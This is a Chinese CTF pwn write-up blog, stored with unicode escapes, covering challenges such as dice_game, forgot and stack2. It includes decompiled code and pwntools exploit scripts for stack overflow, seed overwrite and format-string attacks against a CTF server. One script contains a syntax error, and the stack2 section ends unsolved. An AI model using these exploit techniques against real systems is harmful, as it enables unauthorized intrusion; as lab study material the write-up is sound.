![\"image-20220323161437618\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025555.png\")
<\/div><\/p>\n\u4e0b\u8f7d\u9644\u4ef6\uff0c\u662f\u4e00\u4e2azip\u538b\u7f29\u6587\u4ef6\uff0c\u89e3\u538b\u4e00\u4e0b\uff0c\u518dchecksec\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20220323165013839\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025557.png\")
<\/div><\/p>\n\u53d1\u73b0\u53ea\u6709canary\u6ca1\u5f00\uff0c\u4f5c\u4e3a\u4e00\u4e2a\u5c11\u661f\u7684\u95ee\u9898\uff0c\u592a\u5413\u552c\u4eba\u4e86\uff01<\/p>\n
ida\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n char buf[55]; \/\/ [rsp+0h] [rbp-50h]\n char v5; \/\/ [rsp+37h] [rbp-19h]\n ssize_t v6; \/\/ [rsp+38h] [rbp-18h]\n unsigned int seed[2]; \/\/ [rsp+40h] [rbp-10h] seed\u7684rbp\u504f\u79fb\u503c\u662f10h\uff0c\u5728\u8f93\u5165szName\u7684\u65f6\u5019\u53ef\u4ee5\u8986\u76d6\u5230seed\u7684\u503c\u3002\n unsigned int v8; \/\/ [rsp+4Ch] [rbp-4h]\n\n memset(buf, 0, 0x30uLL);\n *(_QWORD *)seed = time(0LL);\n printf("Welcome, let me know your name: ", a2);\n fflush(stdout);\n v6 = read(0, buf, 0x50uLL); \/\/buf\u5b58\u5728\u8f93\u5165\u70b9\uff0c\u8f93\u5165\u9650\u5236\u662f0x50\uff0cszName\u7684rbp\u504f\u79fb\u503c\u662f50h\uff0c\u521a\u597d\u76f8\u7b49\uff0c\u4e0d\u80fd\u505a\u6808\u6ea2\u51fa\u3002\n if ( v6 <= 49 )\n buf[v6 - 1] = 0;\n printf("Hi, %s. Let's play a game.\\n", buf);\n fflush(stdout);\n srand(seed[0]);\n v8 = 1;\n v5 = 0;\n while ( 1 )\n {\n printf("Game %d\/50\\n", v8);\n v5 = sub_A20();\n fflush(stdout);\n if ( v5 != 1 )\n break;\n if ( v8 == 50 )\n {\n sub_B28(buf);\n break;\n }\n ++v8;\n }\n puts("Bye bye!");\n return 0LL;\n}<\/code><\/pre>\n\u53ef\u4ee5\u770b\u51fa\u903b\u8f91\uff0c\u548c\u968f\u673a\u6570\u6709\u5173\uff0c\u65b0\u624b\u533a\u91cc\u9762\u4e5f\u6709\u4e2a\u4f2a\u968f\u673a\u6570\uff0c\u5e94\u8be5\u548c\u8fd9\u9898\u6709\u76f8\u4f3c\u4e4b\u5904\uff0c\u628a\u968f\u673a\u6570\u7684\u79cd\u5b50\u8986\u76d6\u6210\u6211\u4eec\u5b9a\u4e49\u7684\u56fa\u5b9a\u503c\u3002<\/p>\n
srand(seed[0]);<\/code><\/pre>\n\u518d\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u51fd\u6570\uff1a<\/p>\n
signed __int64 sub_A20()\n{\n signed __int64 result; \/\/ rax\n __int16 v1; \/\/ [rsp+Ch] [rbp-4h]\n __int16 v2; \/\/ [rsp+Eh] [rbp-2h]\n\n printf("Give me the point(1~6): ");\n fflush(stdout);\n _isoc99_scanf("%hd", &v1);\n if ( v1 > 0 && v1 <= 6 )\n {\n v2 = rand() % 6 + 1;\n if ( v1 <= 0 || v1 > 6 || v2 <= 0 || v2 > 6 )\n _assert_fail("(point>=1 && point<=6) && (sPoint>=1 && sPoint<=6)", "dice_game.c", 0x18u, "dice_game");\n if ( v1 == v2 )\n {\n puts("You win.");\n result = 1LL;\n }\n else\n {\n puts("You lost.");\n result = 0LL;\n }\n }\n else\n {\n puts("Invalid value!");\n result = 0LL;\n }\n return result;\n}<\/code><\/pre>\nint __fastcall sub_B28(__int64 a1)\n{\n char s; \/\/ [rsp+10h] [rbp-70h]\n FILE *stream; \/\/ [rsp+78h] [rbp-8h]\n\n printf("Congrats %s\\n", a1);\n stream = fopen("flag", "r");\n fgets(&s, 100, stream);\n puts(&s);\n return fflush(stdout);\n}<\/code><\/pre>\n\u89c2\u5bdf\u4e0a\u8ff0\u51fd\u6570\u53ef\u4ee5\u627e\u5230\u53d1\u73b0\uff1abuf\u5b58\u5728\u8f93\u5165\u70b9\uff0c\u8f93\u5165\u9650\u5236\u662f0x50\uff0cszName\u7684rbp\u504f\u79fb\u503c\u662f50h\uff0c\u521a\u597d\u76f8\u7b49\uff0c\u4e0d\u80fd\u505a\u6808\u6ea2\u51fa\uff0c\u4f46\u662fseed\u7684rbp\u504f\u79fb\u503c\u662f10h\uff0c\u5728\u8f93\u5165szName\u7684\u65f6\u5019\u53ef\u4ee5\u8986\u76d6\u5230seed\u7684\u503c\u3002<\/p>\n
EXP\uff1a<\/h3>\n
\u6784\u5efapayload\uff1a<\/p>\n
#coding:utf8\nfrom pwn import *\nfrom ctypes import *\np = remote('111.200.241.244', 65518)\nlibc = cdll.LoadLibrary('\/home\/kali\/Desktop\/libc.so.6')\nlibc.srand(1)\npayload = b'A' * 0x40 + p64(1)\np.sendlineafter('Welcome, let me know your name: ', payload)\nfor i in range(50):\n rand_value = libc.rand() % 6 + 1\n p.sendlineafter('Give me the point(1~6): ', str(rand_value))\np.interactive()<\/code><\/pre>\n\u8fd0\u884c\u5f97\u5230flag\uff1a<\/p>\n
![\"image-20220323183748823\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\nforgot<\/h2>\n
<\/div><\/p>\n\u6253\u5f00\u9644\u4ef6\uff0c\u67e5\u770b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u53ea\u5f00\u4e86NX\uff0c\u6ca1\u6709canary\u5c31\u610f\u5473\u7740\u53ef\u4ee5\u76f4\u63a5\u6808\u6ea2\u51fa<\/p>\n
IDA\u6253\u5f00\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
int __cdecl main()\n{\n size_t v0; \/\/ ebx\n char v2[32]; \/\/ [esp+10h] [ebp-74h]\n int (*v3)(); \/\/ [esp+30h] [ebp-54h]\n int (*v4)(); \/\/ [esp+34h] [ebp-50h]\n int (*v5)(); \/\/ [esp+38h] [ebp-4Ch]\n int (*v6)(); \/\/ [esp+3Ch] [ebp-48h]\n int (*v7)(); \/\/ [esp+40h] [ebp-44h]\n int (*v8)(); \/\/ [esp+44h] [ebp-40h]\n int (*v9)(); \/\/ [esp+48h] [ebp-3Ch]\n int (*v10)(); \/\/ [esp+4Ch] [ebp-38h]\n int (*v11)(); \/\/ [esp+50h] [ebp-34h]\n int (*v12)(); \/\/ [esp+54h] [ebp-30h]\n char s; \/\/ [esp+58h] [ebp-2Ch]\n int v14; \/\/ [esp+78h] [ebp-Ch]\n size_t i; \/\/ [esp+7Ch] [ebp-8h]\n\n v14 = 1;\n v3 = sub_8048604;\n v4 = sub_8048618;\n v5 = sub_804862C;\n v6 = sub_8048640;\n v7 = sub_8048654;\n v8 = sub_8048668;\n v9 = sub_804867C;\n v10 = sub_8048690;\n v11 = sub_80486A4;\n v12 = sub_80486B8;\n puts("What is your name?");\n printf("> ");\n fflush(stdout);\n fgets(&s, 32, stdin);\n sub_80485DD(&s);\n fflush(stdout);\n printf("I should give you a pointer perhaps. Here: %x\\n\\n", sub_8048654);\n fflush(stdout);\n puts("Enter the string to be validate");\n printf("> ");\n fflush(stdout);\n __isoc99_scanf("%s", v2);\n for ( i = 0; ; ++i )\n {\n v0 = i;\n if ( v0 >= strlen(v2) )\n break;\n switch ( v14 )\n {\n case 1:\n if ( sub_8048702(v2[i]) )\n v14 = 2;\n break;\n case 2:\n if ( v2[i] == 64 )\n v14 = 3;\n break;\n case 3:\n if ( sub_804874C(v2[i]) )\n v14 = 4;\n break;\n case 4:\n if ( v2[i] == 46 )\n v14 = 5;\n break;\n case 5:\n if ( sub_8048784(v2[i]) )\n v14 = 6;\n break;\n case 6:\n if ( sub_8048784(v2[i]) )\n v14 = 7;\n break;\n case 7:\n if ( sub_8048784(v2[i]) )\n v14 = 8;\n break;\n case 8:\n if ( sub_8048784(v2[i]) )\n v14 = 9;\n break;\n case 9:\n v14 = 10;\n break;\n default:\n continue;\n }\n }\n (*(&v3 + --v14))();\n return fflush(stdout);\n}<\/code><\/pre>\n\u53ef\u4ee5\u53d1\u73b0\u6709\u4e24\u5904\u6ea2\u51fa\u70b9\uff0c\u4f46\u662f\u7b2c\u4e00\u5904\u6ca1\u6709\u4ec0\u4e48\u4ef7\u503c\uff0c\u7b2c\u4e8c\u5904\u6ea2\u51fa\u70b9\uff1a<\/p>\n
<\/div><\/p>\n\u6ca1\u6709\u9650\u5236v2\u7684\u8f93\u5165\uff0c\u53ef\u4ee5\u8ba9v2\u6ea2\u51fa\uff0cmain\u51fd\u6570(\\*(&v3 + \u2013v14))()*<\/code>\u610f\u601d\u662f\u8c03\u7528 \u6307\u9488(v3 + (v14 - 1))<\/code>\u6240\u6307\u5411\u7684\u51fd\u6570\uff0c\u5982\u679cv14\u7b49\u4e8e1\uff0c\u90a3\u4e48\u8fd9\u53e5\u8bdd\u8c03\u7528\u7684\u5c31\u662fv3\u539f\u672c\u6307\u5411\u7684\u51fd\u6570\u3002<\/p>\n<\/div><\/p>\n\u800c\u4e14\u7b2c\u4e8c\u4e2a\u8f93\u5165\u70b9\u6709\u9650\u5236\u6761\u4ef6\uff1a<\/p>\n
_BOOL4 __cdecl sub_8048702(char a1)\n{\n return a1 > 96 && a1 <= 122 || a1 > 47 && a1 <= 57 || a1 == 95 || a1 == 45 || a1 == 43 || a1 == 46;\n}<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u5b57\u7b26\u4e32\u7a97\u53e3\uff0c\u53ef\u4ee5\u770b\u5230\u51e0\u4e2a\u6709\u610f\u601d\u7684\u70b9\uff1a<\/p>\n
<\/div><\/p>\n\u8ffd\u8e2a\u4e00\u4e0bsystem\uff0c\u67e5\u770b\u4e00\u4e0b\u5f15\u7528\uff0c\u627e\u5230\uff1a<\/p>\n
int sub_80486CC()\n{\n char s; \/\/ [esp+1Eh] [ebp-3Ah]\n snprintf(&s, 0x32u, "cat %s", ".\/flag");\n return system(&s);\n}<\/code><\/pre>\n\u601d\u8def\uff1a<\/h3>\n\n- \u7b2c\u4e00\u4e2a\u8f93\u5165\u70b9\u968f\u4fbf\u8f93\u5165<\/li>\n
- \u7b2c\u4e8c\u4e2a\u8f93\u5165\u8ba9v2\u6ea2\u51fa\uff0c\u5e76\u4e14\u6bcf\u4f4d\u5fc5\u987b\u4e0d\u7b26\u5408\u6761\u4ef6\uff0c\u4f7fv14\u7684\u503c\u4e00\u76f4\u662f1<\/li>\n
- \u6ea2\u51fa\u8986\u76d6v3\u6307\u5411\u7684\u5730\u5740\uff0c\u6539\u62100x80486CC<\/li>\n
- \u62ff\u5230flag<\/li>\n<\/ul>\n
EXP\uff1a<\/h3>\nfrom pwn import *\npayload = b'A'*32 + p32(0x80486CC) #v2\u5230v3\u95f4\u8ddd(0x74-0x54)\u537332\np = remote('111.200.241.244',63994)\np.sendlineafter('> ','abcd')\np.sendlineafter('> ',payload)\np.interactive()<\/code><\/pre>\n<\/div><\/p>\n\u200b <\/p>\n
monkey<\/h2>\n
<\/div><\/p>\n\u4e0b\u8f7d\u9644\u4ef6\uff0c\u89e3\u538b\uff0c\u67e5\u770b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u6253\u5f00IDA\u770b\u4e00\u4e0b\uff0c\u5934\u77ac\u95f4\u5c31\u5927\u8d77\u6765\u4e86\uff0c\u6587\u4ef6\u8d85\u7ea7\u591a\uff0c\u5934\u5f88\u5927\uff0c\u6253\u5f00main\u51fd\u6570\u4e5f\u53d7\u4e0d\u4e86\u3002<\/p>\n
<\/div><\/p>\n\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\u5427\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u8fd4\u56de\u7684\u4e1c\u897f\u6ca1\u6709\u88ab\u5b9a\u4e49\uff0c\u5c1d\u8bd5\u8f93\u5165\u4e00\u4e0b\u547d\u4ee4\uff1a<\/p>\n
<\/div><\/p>\nhelp\u6709\u53cd\u5e94\uff0c\u5176\u4ed6\u7684\u4e5f\u5c1d\u8bd5\u8fc7\u4f46\u662f\u6ca1\u5565\u53cd\u9988\uff0c\u67e5\u770b\u4e00\u4e0b\u5b57\u7b26\u4e32\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u7f51\u4e0a\u7684wp\uff0c\u663e\u793a\u5e08\u5085\u4eec\u627e\u5230\u4e86os.file<\/code>\u548cos.path<\/code>\u4e24\u4e2a\u5b57\u7b26\u4e32\uff0c\u7136\u540e\u731c\u60f3 os<\/code> \u642d\u914d\u547d\u4ee4\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\u3002<\/p>\nEXP\uff1a<\/h3>\n
\u53c2\u8003\u5e08\u5085\u4eec\u7684wp\uff1a<\/p>\n
from pwn import *\ncontext.log_level = 'debug'\nprocess_name = '.\/js'\n# p = process([process_name], env={'LD_LIBRARY_PATH':'.\/'})\np = remote('111.200.241.244', 57831)\n# elf = ELF(process_name)\np.sendlineafter('js> ', 'os.system(\\'cat flag\\')')\np.interactive()<\/code><\/pre>\n<\/div><\/p>\n\u5c0f\u95ee\u9898\uff1a<\/h3>\n
\u8fd9\u91cc\u6211\u5728\u505a\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u4e2a\u5947\u602a\u7684\u73b0\u8c61\uff1a<\/p>\n
<\/div><\/p>\n\u4e0d\u77e5\u9053\u5565\u60c5\u51b5\u3002<\/p>\n
\u53cd\u5e94\u91dc\u5f00\u5173\u63a7\u5236<\/h2>\n
<\/div><\/p>\n\u6253\u5f00\u73af\u5883\uff0c\u67e5\u770b\u9644\u4ef6\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n
\u62d6\u5165IDA\u8fdb\u884c\u5206\u6790\u3002<\/p>\n
<\/div><\/p>\n\u518d\u770b\u4e00\u4e0b easy<\/code> \u51fd\u6570\u548c easy\u91cc\u9762\u7684normal<\/code> \u51fd\u6570\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u518d\u770b\u4e00\u4e0bshell<\/p>\n
<\/div><\/p>\n\u8fd9\u4e48\u591a\u6f0f\u6d1e\u5728\uff0c\u76f4\u63a5\u5229\u7528\u5c31\u5b8c\u4e8b\u4e86<\/p>\n
EXP\uff1a<\/h3>\nfrom pwn import*\np=remote("111.200.241.244":63940)\nshell=0x4005f6\npayload='a'*0x208+p64(shell)\np.recv()\np.sendline(payload)\np.interactive()<\/code><\/pre>\n<\/div><\/p>\n\u5b9e\u65f6\u6570\u636e\u76d1\u6d4b<\/h2>\n
<\/div><\/p>\n\u6253\u5f00\u73af\u5883\uff0c\u67e5\u770b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u5565\u90fd\u6ca1\u5f00\u3002\u3002\u3002\u3002\u3002<\/p>\n
IDA\u67e5\u770b\u4e00\u4e0bmain\u51fd\u6570\uff1a<\/p>\n
<\/div><\/p>\n\u518d\u770b\u4e00\u4e0blocker\u51fd\u6570\uff1a<\/p>\n
<\/div><\/p>\nlocker\u51fd\u6570\u9996\u5148\u63a5\u53d7\u4e86\u4e00\u4e2a\u5b57\u7b26\u4e32s<\/code>\uff0c\u7136\u540e\u8c03\u7528imagemagic\u51fd\u6570<\/code>\uff0c\u8fd9\u4e2a\u51fd\u6570\u8ddf\u8fdb\u53bb\u67e5\u770b\u5176\u5b9e\u5c31\u662f\u4e00\u4e2aprintf\u51fd\u6570<\/code>\uff0c\u6700\u540e\u6bd4\u8f83key\u7684\u503c\u662f\u4e0d\u662f\u4e3a0x2223322<\/strong>\uff0c\u5982\u679c\u76f8\u7b49\uff0c\u8fd4\u56deshell\uff0c\u5426\u5219\uff0c\u6253\u5370key\u7684\u5730\u5740\u548c\u503c\uff0c\u672c\u5730\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u9996\u5148\u627e\u504f\u79fb\u91cf\uff0cprintf("%p",a) \u7528\u5730\u5740\u7684\u683c\u5f0f\u6253\u5370\u53d8\u91cf a \u7684\u503c\u3002\u6211\u4eec\u5728\u524d\u9762\u8f93\u5165AAAA<\/code>\uff0c\u6240\u4ee5\u53ea\u9700\u8981\u5728\u8fd4\u56de\u7ed3\u679c\u4e2d\u627e\u52300x41414141<\/code>\u5373\u53ef\u786e\u5b9a\u504f\u79fb\u3002<\/p>\n<\/div><\/p>\nEXP\uff1a<\/h3>\nfrom pwn import *\ndebug = False\nif debug:\n conn = process('.\/data')\nelse:\n conn = remote('111.200.241.244', 59741)\nkey_addr = 0x0804a048\nkey_value = 0x2223322\npayload = fmtstr_payload(12, {key_addr: key_value})\nconn.sendline(payload)\nconn.interactive()<\/code><\/pre>\n<\/div><\/p>\nstack2<\/h2>\n
<\/div><\/p>\n\u6253\u5f00\u73af\u5883\uff0c\u67e5\u770b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u6ca1\u6709\u5565\u6536\u83b7\uff0c\u8fd8\u662f\u5f97\u62d6\u5230IDA\u8fdb\u884c\u5206\u6790\uff0c\u67e5\u770b\u4e00\u4e0bmain\u51fd\u6570\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v3; \/\/ eax\n unsigned int v5; \/\/ [esp+18h] [ebp-90h]\n unsigned int v6; \/\/ [esp+1Ch] [ebp-8Ch]\n int v7; \/\/ [esp+20h] [ebp-88h]\n unsigned int j; \/\/ [esp+24h] [ebp-84h]\n int v9; \/\/ [esp+28h] [ebp-80h]\n unsigned int i; \/\/ [esp+2Ch] [ebp-7Ch]\n unsigned int k; \/\/ [esp+30h] [ebp-78h]\n unsigned int l; \/\/ [esp+34h] [ebp-74h]\n char v13[100]; \/\/ [esp+38h] [ebp-70h]\n unsigned int v14; \/\/ [esp+9Ch] [ebp-Ch]\n\n v14 = __readgsdword(0x14u);\n setvbuf(stdin, 0, 2, 0);\n setvbuf(stdout, 0, 2, 0);\n v9 = 0;\n puts("***********************************************************");\n puts("* An easy calc *");\n puts("*Give me your numbers and I will return to you an average *");\n puts("*(0 <= x < 256) *");\n puts("***********************************************************");\n puts("How many numbers you have:");\n __isoc99_scanf("%d", &v5);\n puts("Give me your numbers");\n for ( i = 0; i < v5 && (signed int)i <= 99; ++i )\n {\n __isoc99_scanf("%d", &v7);\n v13[i] = v7;\n }\n for ( j = v5; ; printf("average is %.2lf\\n", (double)((long double)v9 \/ (double)j)) )\n {\n while ( 1 )\n {\n while ( 1 )\n {\n while ( 1 )\n {\n puts("1. show numbers\\n2. add number\\n3. change number\\n4. get average\\n5. exit");\n __isoc99_scanf("%d", &v6);\n if ( v6 != 2 )\n break;\n puts("Give me your number");\n __isoc99_scanf("%d", &v7);\n if ( j <= 0x63 )\n {\n v3 = j++;\n v13[v3] = v7;\n }\n }\n if ( v6 > 2 )\n break;\n if ( v6 != 1 )\n return 0;\n puts("id\\t\\tnumber");\n for ( k = 0; k < j; ++k )\n printf("%d\\t\\t%d\\n", k, v13[k]);\n }\n if ( v6 != 3 )\n break;\n puts("which number to change:");\n __isoc99_scanf("%d", &v5);\n puts("new number:");\n __isoc99_scanf("%d", &v7);\n v13[v5] = v7;\n }\n if ( v6 != 4 )\n break;\n v9 = 0;\n for ( l = 0; l < j; ++l )\n v9 += v13[l];\n }\n return 0;\n}<\/code><\/pre>\n\u6ca1\u6709\u770b\u5230\u660e\u663e\u7684\u6f0f\u6d1e\uff0c\u6ca1\u529e\u6cd5\u53ea\u80fd\u53bb\u7f51\u4e0a\u819c\u62dc\u4e00\u4e0b\u5176\u4ed6\u7684\u5927\u4f6c\u4e86\uff0c\u672c\u9898\u7684\u6808\u6ea2\u51fa\u662f\u56e0\u4e3a\u5bf9v5\u6ca1\u6709\u4efb\u4f55\u68c0\u6d4b\uff0c\u6570\u7ec4\u6ca1\u6709\u8fb9\u754c\u68c0\u67e5\u5bfc\u81f4\u7684\uff0c\u8fd9\u6837\u7684\u6808\u6ea2\u51fa\u6bd4\u8f83\u9690\u853d\u3002<\/p>\n
<\/div><\/p>\n\u518d\u67e5\u770b\u4e00\u4e0b\u5b57\u7b26\u4e32\uff1a<\/p>\n
<\/div><\/p>\n\u8ffd\u8e2a\u4e00\u4e0b\uff0c\u627e\u5230\u4e86\u5947\u602a\u7684\u4e1c\u897f<\/p>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\u8fd9\u4e2ahackhere<\/code>:<\/p>\nint hackhere()\n{\n return system("\/bin\/bash");\n}<\/code><\/pre>\nnice! \u4e0d\u8fc7\u8be5\u51fd\u6570\u8c03\u7528system(''\/bin\/bash')<\/code>\uff0c\u4e00\u822c\u8fdc\u7a0b\u5c31\u7559\u4e00\u4e2ash\u548ccat\u3002<\/p>\n\u6211\u4eec\u53ef\u4ee5\u5229\u7528system\u51fd\u6570\uff0c\u76f4\u63a5\u6267\u884csystem('sh')<\/code>\u3002<\/p>\n\u7136\u800c\u641e\u4e86\u5f88\u957f\u65f6\u95f4\u8fd8\u662f\u6ca1\u6709\u641e\u51fa\u6765\u53ea\u80fd\u53c2\u8003\u5e08\u5085\u4eec\u7684wp\u4e86\uff0c\u8fd9\u9053\u9898\u7559\u5230\u4ee5\u540e\u518d\u91cd\u65b0\u641e\u5427\u3002 <\/p>\n
![\"image-20220323183748823\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025558.png\")
<\/div><\/p>\n![\"image-20220323190217172\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025559.png\")
<\/div><\/p>\n![\"image-20220323190545991\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025560.png\")
<\/div><\/p>\n![\"image-20220323194704345\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025561.png\")
<\/div><\/p>\n![\"image-20220323195603631\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025562.png\")
<\/div><\/p>\n![\"image-20220323192147729\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025563.png\")
<\/div><\/p>\n![\"image-20220323200300678\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025564.png\")
<\/div><\/p>\n![\"image-20220324200638991\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025566.png\")
<\/div><\/p>\n![\"image-20220324201209467\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025567.png\")
<\/div><\/p>\n![\"image-20220324202133051\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025568.png\")
<\/div><\/p>\n![\"image-20220324202340817\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025569.png\")
<\/div><\/p>\n![\"image-20220324202712061\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025570.png\")
<\/div><\/p>\n![\"image-20220324205841815\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025571.png\")
<\/div><\/p>\n![\"image-20220324211418174\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025572.png\")
<\/div><\/p>\n![\"image-20220324212034362\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025573.png\")
<\/div><\/p>\n![\"image-20220324212543636\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025574.png\")
<\/div><\/p>\n![\"image-20220324213410819\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025575.png\")
<\/div><\/p>\n![\"image-20220324213938783\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025576.png\")
<\/div>![\"image-20220324214309403\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025577.png\")
<\/div><\/p>\n![\"image-20220324214951821\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025578.png\")
<\/div><\/p>\n![\"image-20220324220022773\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025579.png\")
<\/div><\/p>\n![\"image-20220325153814771\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025580.png\")
<\/div><\/p>\n![\"image-20220325154947745\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025581.png\")
<\/div><\/p>\n![\"image-20220325155401097\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025582.png\")
<\/div><\/p>\n![\"image-20220325160627278\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025583.png\")
<\/div><\/p>\n![\"image-20220325161145696\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025584.png\")
<\/div><\/p>\n![\"image-20220325161626020\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025585.png\")
<\/div><\/p>\n![\"image-20220325161928310\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025586.png\")
<\/div><\/p>\n![\"image-20220325180142732\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025587.png\")
<\/div><\/p>\n![\"image-20220325180620542\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025589.png\")
<\/div><\/p>\n![\"image-20220325181010542\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025590.png\")
<\/div><\/p>\n![\"image-20220325184342886\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025591.png\")
<\/div><\/p>\n![\"image-20220325184548415\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025592.png\")
<\/div><\/p>\n![\"image-20220325184717378\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040025593.png\")
<\/div><\/p>\n